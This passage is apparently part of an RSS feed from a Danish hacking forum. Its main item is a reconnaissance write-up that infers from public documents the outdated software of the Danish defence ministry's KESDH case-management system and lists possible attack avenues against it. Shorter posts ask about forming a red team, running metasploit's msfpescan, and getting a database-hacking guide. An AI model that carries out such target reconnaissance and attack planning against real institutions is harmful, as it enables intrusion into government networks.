Hvis vi <span style="font-family: Times New Roman;" class="mycode_font">kigger</span> på Support matrix PDF-filen, kan vi se at v4.5 understøtter både <span style="font-weight: bold;" class="mycode_b">Internet Explorer 9</span> og <span style="font-weight: bold;" class="mycode_b">Office 2010</span>, begge i <span style="font-weight: bold;" class="mycode_b">x86</span>.<br />
Lad os i stedet gå til fanen for v3.0, og kigge på dennes tilhørende Support matrix PDF-fil.<br />
Her er de seneste understøttede versioner af <span style="font-weight: bold;" class="mycode_b">Windows, Internet Explorer</span> og <span style="font-weight: bold;" class="mycode_b">Office</span>, henholdsvis <span style="text-decoration: underline;" class="mycode_u">7</span>, <span style="text-decoration: underline;" class="mycode_u">8</span> og <span style="text-decoration: underline;" class="mycode_u">2007</span>.<br />
<br />
<br />
Vi nærmer os noget brugbart information her, og et par Google-søgninger senere, kommer vi frem til et dokument fra Klagenævnet for Udbud, fra erhvervsstyrelsens hjemmeside:<br />
<a href="https://erhvervsstyrelsen.dk/sites/default/files/media/udbud/csc_danmark_as_mod_forsvarsministeriet_v_forsvarets_koncernfaelles_informatiktjeneste_fkit.pdf" target="_blank" rel="noopener" class="mycode_url">https://erhvervsstyrelsen.dk/sites/defau...e_fkit.pdf</a><br />
<br />
Denne sag omhandler udbuddet af det nye it-system, og CSC der mener at KMD har haft en fordel, grundet deres opkøb af ScanJours blah blah blah..<br />
I dokumentet kan vi igen læse om problematikken med forældede versioner af Windows, Office og IE, som ikke kan opdateret ved brug af systemer.<br />
<br />
Desuden ser vi følgende:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Den nuværende KESDH-løsning har været i drift siden primo 2009. Så-vel  servere  som  styreprogrammel  mv.  er  nu  utidssvarende  og  udgør  en ”brændende platform” i relation til opretholdelse af driften af KESDH.Således vurderer FKIT, at (a) der er en høj og stigende risiko for fatalenedbrud  som  følge  af  hardware  fejl,  og  (b)  der  er  en  reel  og  stigendesandsynlighed  for,  at  nødvendigt  reserveudstyr,  ikke  kan  fremskaffes. Derudover  afvikles  KESDH  på  en  driftsplatform  bl.a.  bestående  af <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Windows 2003</span></span> servere, som Microsoft ophører med at supportere fra ogmed den 14. juli 2015. Hertil kommer, at den bestående driftsplatform  ikke  muliggør,  at  derkan opgraderes fra <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Captia version 3.0</span></span> til den seneste <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Captia version 4.7</span></span></blockquote>
<br />
<span style="font-size: xx-large;" class="mycode_size"><span style="font-size: xx-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><span style="font-size: xx-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><span style="font-size: xx-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size">Det stemmer også over ens med nogle af de ting vi fandt tidligere, og vi kan hermed konkludere, at forsvarets IT-sagsbehandlingsprogram, KESDH, højst sandsynligt kører på et system der repræsenterer nedenstående, med mulighed for variationer:<br />
- <span style="font-weight: bold;" class="mycode_b">Windows Server 2003</span><br />
- <span style="font-weight: bold;" class="mycode_b">Internet Explorer 8</span><br />
- Office 2003/<span style="font-weight: bold;" class="mycode_b">2007</span></span></span></span></span></span></span></span></span><br />
<br />
Hvis man leder efter et fodfæste, som eventuelt ville kunne resultere i dybere adgang til et netværk, er denne form for information yderst værdifuld, da man her kan begynde planlægningen af et angreb, som i dette tilfælde nu kan inkludere: <br />
- Server 2003 exploits<br />
- Internet Explorer RCE drive-bys<br />
- Office 2007 exploits<br />
<br />
Om de bruger Office direkte, eller om det er integreret i deres system ved jeg ikke, men der er massere af dokumentation hvis man vil gå i dybden med det. <br />
<br />
Nu ville det så være tid til at finde de nævnte servere, og skanne for porte og services, for at få en bedre forståelse for deres infrastruktur, samt finde yderligere angrebs-vektorer.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Red Teaming?]]></title>
			<link>https://www.shellsec.pw/traad-red-teaming</link>
			<pubDate>Sun, 14 Feb 2016 22:59:22 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-red-teaming</guid>
			<description><![CDATA[Hej SS<br />
Jeg ville spørge om, der er nogle der er interesseret i at lave et lille Red Team? Med Red Team mener jeg bare et hold, hvor man vidensdeler, lærer og ellers har det hyggeligt med noget snik snak inde under penetration testing af netværk og andet spændende :D. (Intet ulovligt) <br />
Nogle interesserede?]]></description>
			<content:encoded><![CDATA[Hej SS<br />
Jeg ville spørge om, der er nogle der er interesseret i at lave et lille Red Team? Med Red Team mener jeg bare et hold, hvor man vidensdeler, lærer og ellers har det hyggeligt med noget snik snak inde under penetration testing af netværk og andet spændende :D. (Intet ulovligt) <br />
Nogle interesserede?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[metasploit under windows xp]]></title>
			<link>https://www.shellsec.pw/traad-metasploit-under-windows-xp</link>
			<pubDate>Fri, 15 Jan 2016 03:18:32 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-metasploit-under-windows-xp</guid>
			<description><![CDATA[Hej derude<br />
Jeg er i gang med at øve mig i fuzzing. Jeg følger denne video lektion:<br />
<a href="https://www.youtube.com/watch?v=TTng0EKTCgQ" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=TTng0EKTCgQ</a><br />
Men der opstår et problem, når jeg skal bruge kommandoen:<br />
msfpescan<br />
kan hverken køre scriptet inde i metasploit konsollen, eller som et ruby script:<br />
ruby msfpescan<br />
Har endda prøvet at installere cygwin, og der kan jeg heller ikke få det til at virke. Håber på at der er nogle herinde der måske ved hvordan jeg skal gribe problemet an.<br />
Mvh]]></description>
			<content:encoded><![CDATA[Hej derude<br />
Jeg er i gang med at øve mig i fuzzing. Jeg følger denne video lektion:<br />
<a href="https://www.youtube.com/watch?v=TTng0EKTCgQ" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=TTng0EKTCgQ</a><br />
Men der opstår et problem, når jeg skal bruge kommandoen:<br />
msfpescan<br />
kan hverken køre scriptet inde i metasploit konsollen, eller som et ruby script:<br />
ruby msfpescan<br />
Har endda prøvet at installere cygwin, og der kan jeg heller ikke få det til at virke. Håber på at der er nogle herinde der måske ved hvordan jeg skal gribe problemet an.<br />
Mvh]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[hack en database?]]></title>
			<link>https://www.shellsec.pw/traad-hack-en-database</link>
			<pubDate>Sat, 18 Jul 2015 17:45:47 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-hack-en-database</guid>
			<description><![CDATA[Hey jeg tænkte på om der var nogle proofs her inde der var nogle nice personer og lave en guide til at hacke databaser for kan se der flere der gerne vil lære det&#128539;[WHITE SMILING FACE] p.s. det vil jeg sku også gerne selv]]></description>
			<content:encoded><![CDATA[Hey jeg tænkte på om der var nogle proofs her inde der var nogle nice personer og lave en guide til at hacke databaser for kan se der flere der gerne vil lære det&#128539;[WHITE SMILING FACE] p.s. det vil jeg sku også gerne selv]]></content:encoded>
		</item>
	</channel>
</rss>